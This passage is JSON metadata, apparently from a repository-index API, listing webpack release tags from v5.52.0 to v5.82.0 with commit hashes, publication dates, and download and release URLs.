ories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https:/